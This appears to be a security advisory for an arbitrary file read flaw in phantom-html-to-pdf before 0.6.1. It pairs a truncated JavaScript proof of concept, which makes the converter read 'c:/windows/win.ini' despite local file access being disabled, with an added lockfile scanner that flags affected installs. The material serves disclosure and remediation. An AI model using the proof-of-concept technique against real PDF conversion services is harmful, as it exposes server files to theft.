Arbitrary File Read in phantom-html-to-pdf
This affects the package phantom-html-to-pdf before 0.6.1.

PoC

```js
var fs = require('fs')
var conversion = require("phantom-html-to-pdf")();
conversion.allowLocalFilesAccess = false
conversion({
  html: "document.write(window.location='c:/windows/win.ini')"
}, function(err, pdf) {
  var output =...
```
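To find affected installs, the following added example (not part of the advisory or of the package's own code) walks a parsed `package-lock.json` and reports every copy of phantom-html-to-pdf below the fixed 0.6.1. The function names and `SAMPLE_LOCK` are assumptions made for illustration, and the sample lockfile is constructed.

```javascript
// Added example, not from the advisory: list installs below the fixed 0.6.1.
const PACKAGE = "phantom-html-to-pdf";
const FIXED = "0.6.1";

// Parse "major.minor.patch" into numbers; any prerelease suffix is ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? m.slice(1).map(Number) : null;
}

// True when version a is strictly lower than version b.
function isBelow(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  if (!pa || !pb) return true; // unparseable (git URL, link): flag for review
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i];
  }
  return false;
}

// lockfileVersion 2/3 keeps a flat "packages" map keyed by node_modules path;
// lockfileVersion 1 only has nested "dependencies". Transitive copies count too.
function findAffected(lock) {
  const hits = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path.endsWith("node_modules/" + PACKAGE) && isBelow(meta.version, FIXED)) {
        hits.push({ path, version: meta.version });
      }
    }
    return hits;
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const here = trail + "node_modules/" + name;
      if (name === PACKAGE && isBelow(meta.version, FIXED)) {
        hits.push({ path: here, version: meta.version });
      }
      walk(meta.dependencies, here + "/");
    }
  };
  walk(lock.dependencies, "");
  return hits;
}

// Constructed sample lockfile: one affected copy, one already at the fix.
const SAMPLE_LOCK = { packages: {
  "node_modules/phantom-html-to-pdf": { version: "0.5.6" },
  "node_modules/other/node_modules/phantom-html-to-pdf": { version: "0.6.1" }
} };
console.log(findAffected(SAMPLE_LOCK));
```

Against a real project, pass the result of `JSON.parse` on the lockfile contents to `findAffected`.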